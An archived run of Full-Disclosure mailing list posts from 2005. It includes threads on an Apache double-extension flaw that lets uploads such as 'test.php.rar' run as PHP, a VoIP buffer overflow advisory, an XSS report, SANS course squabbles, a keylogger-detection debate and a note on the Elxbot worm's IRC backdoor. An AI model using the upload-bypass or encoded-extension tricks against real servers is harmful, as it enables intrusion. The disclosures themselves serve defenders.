http://security.ubuntu.com/ubuntu/pool/universe/m/mysql-dfsg-4.1/mysql-client-4.1_4.1.12-1ubuntu3.1_amd64.deb Size/MD5: 897406 29713a5ce0c8b18cb7b8d49809f4aefb http://security.ubuntu.com/ubuntu/pool/universe/m/mysql-dfsg-4.1/mysql-server-4.1_4.1.12-1ubuntu3.1_amd64.deb Size/MD5: 18429032 677948b959d99cdca3770e32c19601f6 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-4.1/libmysqlclient14-dev_4.1.12-1ubuntu3.1_i386.deb Size/MD5: 5347118 2944f5066bed041df004c51cd7e511e1 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-4.1/libmysqlclient14_4.1.12-1ubuntu3.1_i386.deb Size/MD5: 1474316 d23d2f2af47577fbda0f754547a44fae http://security.ubuntu.com/ubuntu/pool/universe/m/mysql-dfsg-4.1/mysql-client-4.1_4.1.12-1ubuntu3.1_i386.deb Size/MD5: 865524 afdde59778fc2bc0971a959bc91960cb http://security.ubuntu.com/ubuntu/pool/universe/m/mysql-dfsg-4.1/mysql-server-4.1_4.1.12-1ubuntu3.1_i386.deb Size/MD5: 17335734 ea56a770e30cff750d7894e787deaefe powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-4.1/libmysqlclient14-dev_4.1.12-1ubuntu3.1_powerpc.deb Size/MD5: 6067392 661904ba18915482689a65594fbb8f66 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-4.1/libmysqlclient14_4.1.12-1ubuntu3.1_powerpc.deb Size/MD5: 1547466 69a5573b7a30c2993e2e5685fd00a3a9 http://security.ubuntu.com/ubuntu/pool/universe/m/mysql-dfsg-4.1/mysql-client-4.1_4.1.12-1ubuntu3.1_powerpc.deb Size/MD5: 936726 a060001f07b8c239f9b1d2b4b064c83d http://security.ubuntu.com/ubuntu/pool/universe/m/mysql-dfsg-4.1/mysql-server-4.1_4.1.12-1ubuntu3.1_powerpc.deb Size/MD5: 18521170 f858e627120278b8245079d77e61348e -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051205/bc32787f/attachment.bin From tkrpata at bjs.com Mon Dec 5 14:56:14 2005 From: tkrpata at bjs.com (Krpata, Tyler) Date: Mon, 5 Dec 2005 09:56:14 -0500 Subject: [Full-disclosure] Bug with .php extension? Message-ID: It doesn't seem to matter if the mime type is known or not, for example foo.php.txt and foo.php.html are both interpreted as PHP scripts on my test server. (Apache/2.0.54) -----Original Message----- From: Stanza [mailto:d.stanzani at gmail.com] Sent: Monday, December 05, 2005 5:25 AM To: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] Bug with .php extension? I suppose this is a great bug. It work also on apache 2. If a user can upload a file and it's extension isn't associated to a mime-type, the server processes it as a php file.. Stanza On 12/5/05, Chris Umphress wrote: > On 12/4/05, Ron wrote: > > I'm not sure whether this is something that's well known, but I've > > never seen anything about it, and I nearly got burned by it, so I > > figured I'd post it here. > > > > In Apache 1.3.33 (untested on any other version), if you have a file > > called file.php.bak, and you navigate to it in the browser, it will > > run on the server as a .php file. This works with any extension > > that isn't known to the server (.rar, .bak, .test, .java, .cpp, .c, > > etc.) > > > > This can impact upload scripts, if they don't rename. I had a > > script that was only allowing a very limited number of file names, > > including .rar. I realized that I could upload the file > > test.php.rar, as demonstrated here: > > http://www.javaop.com/~iago/test.php.rar > > > > (I assure you that that's a .php script, not just that text file). > > Whoa, that's interesting. Testing on Apache 2.0.54 gets the same result. > > $ echo "">/path/to/htdocs/test.php.rar $ wget > http://localhost/test.php.rar -O /tmp/test.txt $ cat > /tmp/test.text;echo > > Prints "test". I hadn't heard about this. Thankfully, my webserver > isn't susceptible to such attacks, let me show you why. In my > httpd.conf file, I have: > > Alias /uploads/ "/var/www/htdocs/" > Alias /uploads "/var/www/htdocs/" > > First, I'm not naming the real directory.... Second, if someone did > find the upload directory, they would be redirected to the root of the > server. They couldn't run the script on my server no matter how hard > they tried. > > Thanks for the information. > > -- > Chris Umphress > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From john.r.bond at gmail.com Mon Dec 5 15:51:51 2005 From: john.r.bond at gmail.com (John Bond) Date: Mon, 5 Dec 2005 15:51:51 +0000 Subject: [Full-disclosure] Bug with .php extension? In-Reply-To: References: Message-ID: http://localhost:8080/error%2e%70%68%70.log also works From john.r.bond at gmail.com Mon Dec 5 15:59:42 2005 From: john.r.bond at gmail.com (John Bond) Date: Mon, 5 Dec 2005 15:59:42 +0000 Subject: [Full-disclosure] Bug with .php extension? In-Reply-To: References: Message-ID: recognixed extentions (txt, gif, html) or *not* interpreted as php on my machine, just as text. Apache/2.0.54 (Win32) PHP/5.0.4 On 05/12/05, John Bond wrote: > http://localhost:8080/error%2e%70%68%70.log also works > From xploitable at gmail.com Mon Dec 5 16:38:06 2005 From: xploitable at gmail.com (n3td3v) Date: Mon, 5 Dec 2005 16:38:06 +0000 Subject: [Full-disclosure] Re: Google is vulnerable from XSS attack In-Reply-To: <4b6ee9310512022036j71d64dcbk7c79aef077ad8e66@mail.gmail.com> References: <4b6ee9310512022036j71d64dcbk7c79aef077ad8e66@mail.gmail.com> Message-ID: <4b6ee9310512050838h4d41e493g430408643d6c1512@mail.gmail.com> ***Still unpatched & vulnerable*** On 12/3/05, n3td3v wrote: > Vendor: Google > > Service: Groups > > Issue: XSS in pending message page > > Credit: n3td3v From wilder_jeff at msn.com Mon Dec 5 16:55:02 2005 From: wilder_jeff at msn.com (wilder_jeff Wilder) Date: Mon, 05 Dec 2005 09:55:02 -0700 Subject: [Full-disclosure] IT security professionals in demand in 2006 In-Reply-To: <00bc01c5f945$fc232af0$0100a8c0@nuclearwinter> Message-ID: Not to validate the cissp... but try to get a good security job with out it. I do not have to know how to forge the steel, machine the metal, build an engine in order to drive a car. I understand the the inner workings of an application how how it interacts with the differnent layes... There are the eliete individuals... the top 5-10% that can actually write their own exploit code, but in the industrial industy where we are not creating our own applications, what good is it? I'm not going to say if the cissp was good or bad.. but I ca tell you, after all the studies and time in prep, I understand the business side of security. If you dont understand that side of it.. you can hack all you want from a dark room in the basement, but your never going to be able to make a bigger impact in the industry as a whole. Its money that makes the world move. I cannot say that my skill at preventing a hack was any better after the cissp then before it... but because of the certification, it placed me into a position where I can learn far more then sitting in my dungeon at home. -Jeff Wilder CISSP,CCE,C/EH -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GIT/CM/CS/O d- s:+ a C+++ UH++ P L++ E- w-- N+++ o-- K- w O- M-- V-- PS+ PE- Y++ PGP++ t+ 5- X-- R* tv b++ DI++ D++ G e* h--- r- y+++* ------END GEEK CODE BLOCK------ >From: "sk" >To: >Subject: Re: [Full-disclosure] IT security professionals in demand in 2006 >Date: Mon, 5 Dec 2005 03:45:18 +0100 >MIME-Version: 1.0 >Received: from lists.grok.org.uk ([195.184.125.51]) by MC8-F37.hotmail.com >with Microsoft SMTPSVC(6.0.3790.211); Mon, 5 Dec 2005 00:59:24 -0800 >Received: from lists.grok.org.uk (localhost [127.0.0.1])by >lists.grok.org.uk (Postfix) with ESMTP id 322AE27D;Mon, 5 Dec 2005 >08:57:53 +0000 (GMT) >Received: from hosting.g-0.org >(hosting.GroundZero-Security.com[217.172.172.12])by lists.grok.org.uk >(Postfix) with ESMTP id 8370DD8for ;Mon, > 5 Dec 2005 02:46:53 +0000 (GMT) >Received: from nuclearwinter (p5499EDB0.dip.t-dialin.net >[84.153.237.176])by hosting.g-0.org (8.13.1/8.13.1/SuSE Linux 0.7) with >SMTP idjB52kT8u006885for ; Mon, 5 Dec >2005 03:46:42 +0100 >X-Message-Info: JGTYoYF78jG54YUSJSmbzlfPWdFewmiFRINzDDRhcKc= >X-Original-To: full-disclosure at lists.grok.org.uk >Delivered-To: full-disclosure at lists.grok.org.uk >References: <6450e99d0512041801p4adf24bclb8deaeefd203fa9a at mail.gmail.com> >X-MSMail-Priority: Normal >X-Mailer: Microsoft Outlook Express 6.00.2800.1506 >X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1506 >X-Mailman-Approved-At: Mon, 05 Dec 2005 08:57:42 +0000 >X-BeenThere: full-disclosure at lists.grok.org.uk >X-Mailman-Version: 2.1.5 >Precedence: list >List-Id: An unmoderated mailing list for the discussion of security >issues >List-Unsubscribe: >, > >List-Archive: >List-Post: >List-Help: >List-Subscribe: >, > >Errors-To: full-disclosure-bounces at lists.grok.org.uk >Return-Path: full-disclosure-bounces at lists.grok.org.uk >X-OriginalArrivalTime: 05 Dec 2005 08:59:24.0758 (UTC) >FILETIME=[30A82760:01C5F97A] > >CISSP is bullshit. as eeye said 99% of the security consultants do their >pen-tests with automated tools which is pathetic in my opinion. >if you cant write exploits, you are no professional, more like a steam >blower. how can someone be professional when he doesnt >even understand how an exploit works in deep? what if there are custom >scripts or exotic daemons installed? without beeing able to audit >code and understand how certain bugs are beeing exploited, how can someone >think he got enough clue to do a professional security audit? >its just a rip off of the customers as simple as that. or would you pay >someone to run an automated tool against your host, sit back and wait >till a nice pdf statistic is generated so he got something to present to >you? of course you wouldnt. in the 90s the people still had to learn on >their own and all the mainstream hackers who speak at your conventions >didnt >learn their knowledge from stupid class rooms. >everyone who thinks hes a security professional or even a hacker after he >made some certs, is just living in a dream world. >then again the media plays well with the steam blowers so they can make a >nice living.. >sorry i just had to say that since its going on my nerves how all these >people suddenly think their stupid certs make em special, but then if >it comes to knowledge everyone is cluless... > >-sk >----- Original Message ----- >From: "Ivan ." >To: >Sent: Monday, December 05, 2005 3:01 AM >Subject: [Full-disclosure] IT security professionals in demand in 2006 > > > > http://www.computerworld.com.au/index.php/id;923889191;fp;16;fpid;0 > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ From jpierini at hotmail.com Mon Dec 5 17:13:03 2005 From: jpierini at hotmail.com (Joseph Pierini) Date: Mon, 5 Dec 2005 09:13:03 -0800 Subject: [Full-disclosure] Re: Google is vulnerable from XSS attack In-Reply-To: <4b6ee9310512050838h4d41e493g430408643d6c1512@mail.gmail.com> Message-ID: N3td3v, Thanks for the info. Wow, it must have been an exhaustive search to find that needle in a haystack. I'm sure Google appreciates your time and effort. Keep up the good work! -J ***Still unpatched & vulnerable*** On 12/3/05, n3td3v wrote: > Vendor: Google > > Service: Groups > > Issue: XSS in pending message page > > Credit: n3td3v _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From SLAB_research at securitylab.net Mon Dec 5 17:54:52 2005 From: SLAB_research at securitylab.net (SecurityLab Research) Date: Mon, 5 Dec 2005 12:54:52 -0500 Subject: [Full-disclosure] Buffer Overflow in MultiTech VoIP Implementations Message-ID: <000501c5f9c4$fefbfac0$6608a8c0@7B15E5403E9> SecurityLab Technologies, Inc. --- www.securitylab.net --- Security Advisory Advisory Name: Buffer Overflow in MultiTech VoIP Implementations Release Date: December 05, 2005 Application: MultiVoIP Gateway Platform: Multiple Severity: Moderate Author: Ejovi Nuwere Vendor Status: Patched in Version x.08 Reference: http://www.securitylab.net/research/ Overview: The MultiVOIP voice over IP gateway provides toll-free voice and fax communications over the Internet or Intranet. Occasionally MultiTech develops and licenses their VoIP Gateways and VoIP related stacks for inclusion in third party platforms. Therefore, this bug may affect products outside of the MultiTech line. SecurityLab technologies has discovered a remote buffer overflow in MultiTech's MultiVOIP product line that may lead to remote code execution. Details: The buffer overflow occurs in the SIP packet INVITE field with a string greater than 60 characters. Testing was performed on an embedded device with limited debug environment. Source code was not avaible for further analysys. Vendor Response: Patched. Version x.08 Recommendation: Contact vendor for current release. Site of the day: InfoSecDaily http://www.infosecdaily.net security news for security professionals Copyright 2005 SecurityLab Technologies, Inc. You may distribute freely without modification. From c0ntexb at gmail.com Mon Dec 5 19:10:37 2005 From: c0ntexb at gmail.com (c0ntex) Date: Mon, 5 Dec 2005 19:10:37 +0000 Subject: [Full-disclosure] SANS Stuff Message-ID: I recall an email thread this month relating to bootcaps and how advanced SANS was. After having a look at the "Stay Sharp" courses, I see: "Stay Sharp: FAT File System In-Depth Note: This is an advanced course. Students should already be familiar with concepts such as a file system and tools such as a hex editor. While the course does briefly review these concepts, the focus of this course is on the FAT file system. It is recommended that students taking this course should prepare by refreshing themselves with the following concepts: * Conversion between hexadecimal, decimal, and binary numbers * Basic concepts of a file system (e.g. files, directories, and time stamps)" You know what a file is right.... but what about a directory!? lol Enrol now and get a 25% discount on: "Stay Sharp: How To Tie Your Shoe laces " -- regards c0ntex From c0ntexb at gmail.com Mon Dec 5 19:24:11 2005 From: c0ntexb at gmail.com (c0ntex) Date: Mon, 5 Dec 2005 19:24:11 +0000 Subject: [Full-disclosure] SANS Stuff In-Reply-To: <43949337.1060006@gmail.com> References: <43949337.1060006@gmail.com> Message-ID: On 05/12/05, James Tucker wrote: > Sorry, what are you on about? http://www.sans.org/staysharp/ > That's not evena curriculum, as such it has no basis for what the > contents of the course are. http://www.sans.org/staysharp/ > If you're going to diss a group, at least actually succeed in doing so > instead of just being a prat and posting someone else's content on a > large mailing list. Have a look before opening your gob :-) -- regards c0ntex From c0ntexb at gmail.com Mon Dec 5 19:28:39 2005 From: c0ntexb at gmail.com (c0ntex) Date: Mon, 5 Dec 2005 19:28:39 +0000 Subject: [Full-disclosure] SANS Stuff In-Reply-To: <4394943D.2070903@gmail.com> References: <43949337.1060006@gmail.com> <4394943D.2070903@gmail.com> Message-ID: On 05/12/05, James Tucker wrote: > Er, in your mail you posted content, not a link to the sans pages. I did > look at your mail. No need to be rude. I don't recall calling anyone a prat, so perhaps watch your own rude mouth before speaking. Anyway, just having a festive giggle to myself and I thought someone on the list might find it funny. Guess that counts you out :-) -- regards c0ntex From infosecbofh at gmail.com Mon Dec 5 19:35:43 2005 From: infosecbofh at gmail.com (InfoSecBOFH) Date: Mon, 5 Dec 2005 11:35:43 -0800 Subject: [Full-disclosure] SANS Stuff In-Reply-To: References: <43949337.1060006@gmail.com> <4394943D.2070903@gmail.com> Message-ID: <2be58a30512051135r56f68e5cmeb7df20b89e2fdb9@mail.gmail.com> That is hilarious and proves that a.) Mr. Tucker has his head so far up SANS ass...that he can't see how stupid it really is and b.) SANS is truly a waste of time/money. On 12/5/05, c0ntex wrote: > On 05/12/05, James Tucker wrote: > > > Er, in your mail you posted content, not a link to the sans pages. I did > > look at your mail. No need to be rude. > > I don't recall calling anyone a prat, so perhaps watch your own rude > mouth before speaking. > > Anyway, just having a festive giggle to myself and I thought someone > on the list might find it funny. Guess that counts you out :-) > > -- > > regards > c0ntex > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From mmadison at fnni.com Mon Dec 5 19:54:16 2005 From: mmadison at fnni.com (Madison, Marc) Date: Mon, 5 Dec 2005 13:54:16 -0600 Subject: [Full-disclosure] SANS Stuff Message-ID: http://www.sans.org/staysharp/ http://www.sans.org/ssptech_orlando06/description.php?tid=363&portal=736 cfd3373605845e40aa1c782da0e8e "After taking this class you'll no longer have to rely on your automated forensic tools, you'll be able to dive down to the byte level. You'll even be able to find data that your automated tools might miss. -Michael Murr " Yea, such as you 1989 term paper on the benefits of the FAT file system.... From c0ntexb at gmail.com Mon Dec 5 19:55:23 2005 From: c0ntexb at gmail.com (c0ntex) Date: Mon, 5 Dec 2005 19:55:23 +0000 Subject: [Full-disclosure] SANS Stuff In-Reply-To: <2be58a30512051135r56f68e5cmeb7df20b89e2fdb9@mail.gmail.com> References: <43949337.1060006@gmail.com> <4394943D.2070903@gmail.com> <2be58a30512051135r56f68e5cmeb7df20b89e2fdb9@mail.gmail.com> Message-ID: On 05/12/05, InfoSecBOFH wrote: > That is hilarious and proves that a.) Mr. Tucker has his head so far > up SANS ass...that he can't see how stupid it really is and b.) SANS > is truly a waste of time/money. I think James just misread my email as unfounded, since I never supplied a link to the page, or something. Maybe I am just missing it but I can't really see how promoting knowledge of the outdated FAT file system will make you "Sharp", it's not exactly a cutting edge technology... coupled with the requirement to know what a file and a directory is - wouldn't attending that make you feel like a right chump. Next thing we will have Morning_Wood coming out with an "0day Exploit Code" for file creation lol -- regards c0ntex From jftucker at gmail.com Mon Dec 5 20:08:06 2005 From: jftucker at gmail.com (James Tucker) Date: Mon, 05 Dec 2005 20:08:06 +0000 Subject: [Full-disclosure] SANS Stuff In-Reply-To: References: <43949337.1060006@gmail.com> <4394943D.2070903@gmail.com> <2be58a30512051135r56f68e5cmeb7df20b89e2fdb9@mail.gmail.com> Message-ID: <43949E26.10907@gmail.com> c0ntex wrote: >On 05/12/05, InfoSecBOFH wrote: > > >>That is hilarious and proves that a.) Mr. Tucker has his head so far >>up SANS ass...that he can't see how stupid it really is and b.) SANS >>is truly a waste of time/money. >> >> > >I think James just misread my email as unfounded, since I never >supplied a link to the page, or something. > >Maybe I am just missing it but I can't really see how promoting >knowledge of the outdated FAT file system will make >you "Sharp", it's not exactly a cutting edge technology... coupled >with the requirement to know what a file and a directory is - >wouldn't attending that make you feel like a right chump. > >Next thing we will have Morning_Wood coming out with an "0day Exploit >Code" for file creation lol > > Staying sharp could mean many things. Yes, I completely agree that this course does not keep you up to date with current file system technologies, and it is becoming increasingly unlikely that one could provide any valuable forensic service with only a knowledge of FAT. However: 1. that course is only $200. 2. all filesystem courses introduce simple filesystems first, 3. this is a short course, it's not likely they could get most candidates further without damaging the retention ratio significantly. Suggesting that teaching of old filesystems is useless is moronic, everyone has to start to learn somewhere. I don't therefore find it "funny" that it's being offered. FYI this is generally the type of course you would find at a university during an introductory OS course. "After taking this class you'll no longer have to rely on your automated forensic tools, you'll be able to dive down to the byte level. You'll even be able to find data that your automated tools might miss. -Michael Murr " - that is hilariously out of date however, and also may be now incorrect due to changes of scale. From forensis.technica at gmail.com Mon Dec 5 20:07:22 2005 From: forensis.technica at gmail.com (Technica Forensis) Date: Mon, 5 Dec 2005 15:07:22 -0500 Subject: [Full-disclosure] SANS Stuff In-Reply-To: References: <43949337.1060006@gmail.com> <4394943D.2070903@gmail.com> <2be58a30512051135r56f68e5cmeb7df20b89e2fdb9@mail.gmail.com> Message-ID: what are floppies formatted with, again? as bad as FAT is, it's hardly outdated. most people focus on the big picture and never learn the guts of the file system, so a class like this is extremely useful - especially in the forensics arena. On 12/5/05, c0ntex wrote: > On 05/12/05, InfoSecBOFH wrote: > > That is hilarious and proves that a.) Mr. Tucker has his head so far > > up SANS ass...that he can't see how stupid it really is and b.) SANS > > is truly a waste of time/money. > > I think James just misread my email as unfounded, since I never > supplied a link to the page, or something. > > Maybe I am just missing it but I can't really see how promoting > knowledge of the outdated FAT file system will make > you "Sharp", it's not exactly a cutting edge technology... coupled > with the requirement to know what a file and a directory is - > wouldn't attending that make you feel like a right chump. > > Next thing we will have Morning_Wood coming out with an "0day Exploit > Code" for file creation lol > > -- > > regards > c0ntex > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From srenna at lcssecuritygroup.com Mon Dec 5 20:08:31 2005 From: srenna at lcssecuritygroup.com (srenna at lcssecuritygroup.com) Date: Mon, 05 Dec 2005 13:08:31 -0700 Subject: [Full-disclosure] SANS Stuff Message-ID: <20051205130831.00dbdd8602db7730ea9395745a09b2d2.d3688c632b.wbe@email.email.secureserver.net> It keeps SANS bank accounts sharp. > -------- Original Message -------- > Subject: Re: [Full-disclosure] SANS Stuff > From: c0ntex > Date: Mon, December 05, 2005 2:55 pm > To: InfoSecBOFH > Cc: full-disclosure at lists.grok.org.uk > > On 05/12/05, InfoSecBOFH wrote: > > That is hilarious and proves that a.) Mr. Tucker has his head so far > > up SANS ass...that he can't see how stupid it really is and b.) SANS > > is truly a waste of time/money. > > I think James just misread my email as unfounded, since I never > supplied a link to the page, or something. > > Maybe I am just missing it but I can't really see how promoting > knowledge of the outdated FAT file system will make > you "Sharp", it's not exactly a cutting edge technology... coupled > with the requirement to know what a file and a directory is - > wouldn't attending that make you feel like a right chump. > > Next thing we will have Morning_Wood coming out with an "0day Exploit > Code" for file creation lol > > -- > > regards > c0ntex > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From thegesus at gmail.com Mon Dec 5 20:16:48 2005 From: thegesus at gmail.com (TheGesus) Date: Mon, 5 Dec 2005 15:16:48 -0500 Subject: [Full-disclosure] SANS Stuff In-Reply-To: <20051205130831.00dbdd8602db7730ea9395745a09b2d2.d3688c632b.wbe@email.email.secureserver.net> References: <20051205130831.00dbdd8602db7730ea9395745a09b2d2.d3688c632b.wbe@email.email.secureserver.net> Message-ID: <5e70f6530512051216n5858a7bcqb8fe959ed041d048@mail.gmail.com> Doesn't anyone have a bad analogy yet? On 12/5/05, srenna at lcssecuritygroup.com wrote: > It keeps SANS bank accounts sharp. > > From c0ntexb at gmail.com Mon Dec 5 20:17:55 2005 From: c0ntexb at gmail.com (c0ntex) Date: Mon, 5 Dec 2005 20:17:55 +0000 Subject: [Full-disclosure] SANS Stuff In-Reply-To: References: <43949337.1060006@gmail.com> <4394943D.2070903@gmail.com> <2be58a30512051135r56f68e5cmeb7df20b89e2fdb9@mail.gmail.com> Message-ID: On 05/12/05, Technica Forensis wrote: > what are floppies formatted with, again? as bad as FAT is, it's > hardly outdated. > > most people focus on the big picture and never learn the guts of the > file system, so a class like this is extremely useful - especially in > the forensics arena. Sure, though the requirement is not a knowledge of assembler or virii.... but it is "files and directories" - what do you expect to learn, how much data can be stored on a FAT32 partition or what MBR looks like. This is school stuff isn't it? -- regards c0ntex From rrenshaw at ford.com Mon Dec 5 20:32:14 2005 From: rrenshaw at ford.com (Renshaw, Rick (C.)) Date: Mon, 5 Dec 2005 15:32:14 -0500 Subject: [Full-disclosure] Most common keystroke loggers? Message-ID: <51E88E13CDA16B43AAD6FDA7393C4A410126680F@na1fcm51.dearborn.ford.com> -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of foofus at foofus.net Sent: Friday, December 02, 2005 6:39 PM To: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] Most common keystroke loggers? On Sat, Dec 03, 2005 at 12:22:17PM +1300, Nick FitzGerald wrote: >> Ahh, no... >> >> http://en.wikipedia.org/wiki/Halting_problem >> >> Basically (and simplifying a lot), the Halting Problem means that you >> cannot write a computer program to determine if some other program >> exhibits "function X", _in finite time_. >I don't think this is what the Halting Problem means. My understanding is that it means you can't write a program to determine if *any* other program exhibits "function X", >in finite time. For a particular program, however, this may be quite feasible. You're right, the particular problem of finding if a program exhibits "function X" is Rice's Theorem, which is related to the Halting problem, but is properly a subset of the problem. http://en.wikipedia.org/wiki/Rice%27s_theorem >> Thus, you cannot write a >> program to detect all viruses, you cannot write a program to detect key >> loggers, you cannot write a prorgram to detect all spyware, etc, etc. >How do you know that the problem of detecting all keystroke loggers is >equivalent to the Halting Program? Is there a proof somewhere that > keystroke loggers do not share some characteristic that makes them detectable? > <-- I am not being sarcastic; this is an earnest question. Quoted (with minor changes of what the function does) from the Rice's theorem page referenced above: Suppose we have an algorithm for examining a program p and determining infallibly whether p is an implementation of a keystroke logger. The claim is that we can convert our algorithm for identifying key loggers into one which identifies functions that halt. We will describe an algorithm with takes inputs a and I and determines whether program a halts when given input i. The algorithm is simple, we construct a new program t which (1) temporarily ignores its input while it tries to execute program a on input i, and then, if that halts, (2) returns whether a keylogger was detected. Clearly, t is a function for finding keyloggers if and only if step 1 halts. Since we've assumed that we can infallibly identify programs for finding keyloggers, we can determine whether t is such a program, and therefore whether program a halts on input i. Note that we needn't actually execute t, we need only decide whether it is a squaring program, and, by hypothesis, we know how to do this. >My formal CS background is weak, but I don't think the problem of programmatically detecting compromised machines of a given OS (not the general case of "compromised machines >of any sort) has been proven >to be undecidable in the strong way that the Halting Problem has. I may >be wrong, though, which is why I ask. From forensis.technica at gmail.com Mon Dec 5 20:36:01 2005 From: forensis.technica at gmail.com (Technica Forensis) Date: Mon, 5 Dec 2005 15:36:01 -0500 Subject: [Full-disclosure] SANS Stuff In-Reply-To: References: <43949337.1060006@gmail.com> <4394943D.2070903@gmail.com> <2be58a30512051135r56f68e5cmeb7df20b89e2fdb9@mail.gmail.com> Message-ID: A large percentage of the "forensics experts" out there have criminology related degrees and not a single CS class in their repertoire. I've given several talks on file systems at forensic related conferences that have always been well received. Based on the questions/comments I get, most people know what metadata was stored with a file, but not necessarily what the on disk format is, or how to recreate a cluster-chain by hand, etc. I'll gladly save anyone that asks the $200 and give up a list of resources on file systems that will tell you just as much, if not more, than SANS's 'class' will cover ;-) (you're welcome, Stephen) On 12/5/05, c0ntex wrote: > On 05/12/05, Technica Forensis wrote: > > what are floppies formatted with, again? as bad as FAT is, it's > > hardly outdated. > > > > most people focus on the big picture and never learn the guts of the > > file system, so a class like this is extremely useful - especially in > > the forensics arena. > > Sure, though the requirement is not a knowledge of assembler or > virii.... but it is "files and directories" - what do you expect to > learn, how much data can be stored on a FAT32 partition or what MBR > looks like. This is school stuff isn't it? > > -- > > regards > c0ntex > From jftucker at gmail.com Mon Dec 5 20:42:08 2005 From: jftucker at gmail.com (James Tucker) Date: Mon, 05 Dec 2005 20:42:08 +0000 Subject: [Full-disclosure] SANS Stuff In-Reply-To: References: <43949337.1060006@gmail.com> <4394943D.2070903@gmail.com> <2be58a30512051135r56f68e5cmeb7df20b89e2fdb9@mail.gmail.com> Message-ID: <4394A620.90409@gmail.com> c0ntex wrote: > Sure, though the requirement is not a knowledge of assembler or > virii.... but it is "files and directories" - what do you expect to > learn, how much data can be stored on a FAT32 partition or what MBR > looks like. This is school stuff isn't it? Depends where you went to school. The course is therefore for people that didn't learn this in 'school'. Assembler and viri have nothing to do with filesystems. The abstractions are seperate. From lyal.collins at key2it.com.au Mon Dec 5 20:42:02 2005 From: lyal.collins at key2it.com.au (Lyal Collins) Date: Tue, 6 Dec 2005 07:42:02 +1100 Subject: [Full-disclosure] SANS Stuff In-Reply-To: Message-ID: <001901c5f9dc$58b5d4c0$6600a8c0@kpllaptop> And USB keys/thumb drives are FAT, usually. -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Technica Forensis Sent: Tuesday, 6 December 2005 7:07 AM To: c0ntex Cc: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] SANS Stuff what are floppies formatted with, again? as bad as FAT is, it's hardly outdated. most people focus on the big picture and never learn the guts of the file system, so a class like this is extremely useful - especially in the forensics arena. On 12/5/05, c0ntex wrote: > On 05/12/05, InfoSecBOFH wrote: > > That is hilarious and proves that a.) Mr. Tucker has his head so far > > up SANS ass...that he can't see how stupid it really is and b.) > > SANS is truly a waste of time/money. > > I think James just misread my email as unfounded, since I never > supplied a link to the page, or something. > > Maybe I am just missing it but I can't really see how promoting > knowledge of the outdated FAT file system will make you "Sharp", it's > not exactly a cutting edge technology... coupled with the requirement > to know what a file and a directory is - wouldn't attending that make > you feel like a right chump. > > Next thing we will have Morning_Wood coming out with an "0day Exploit > Code" for file creation lol > > -- > > regards > c0ntex > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From dj at outpost24.com Mon Dec 5 20:20:58 2005 From: dj at outpost24.com (David Jacoby) Date: Mon, 05 Dec 2005 21:20:58 +0100 Subject: [Full-disclosure] Outpost24 Public Security Note: Linux/Elxbot Message-ID: <4394A12A.9010104@outpost24.com> _______ __ __ ______ _____ | |.--.--.| |_ .-----..-----..-----.| |_ |__ || | | | - || | || _|| _ || _ ||__ --|| _|| __||__ | |_______||_____||____|| __||_____||_____||____||______| |__| Public Security Note |__| http://www.outpost24.com [BACKGROUND] Mambo is a dynamic portal engine and content management system. The software is written in PHP. A computer researcher which goes under the alias rgod released an exploit for the "register_globals" Emulation Layer Overwrite vulnerability and just a few days after the vulnerability was released increased attacks for this vulnerability was monitored, the increased traffic is due to a worm which is currently in the wild. [DESCRIPTION] Linux/Elxbot is a backdoor for the Mambo vulnerability. It will search on Google for vulnerable targets. Once it infects a computer it will connect to a predetermined IRC server where the attackers will wait and have the possibility to gain access to the infected computer. The attackers may also perform various tasks such as: * Execute arbitrary commands * TCP flood * HTTP flood * UDP flood * Search Google for more vulnerable targets * Portscan On certain systems it will also download a perl script which will allow the attacker to create a backchannel and spawn a shell on the infected computer with the same privileges as the running webserver. A detailed profile is available for Outpost24 members, for more information please visit our webpage at http://www.outpost24.com [SOLUTION] Download the latest version from the official Mambo homepage or download the specific patch for this vulnerability. http://mamboforge.net/frs/download.php/7636/Mambo4523.security_fix.zip [AUTHOR] Backdoor was analyzed by David Jacoby at 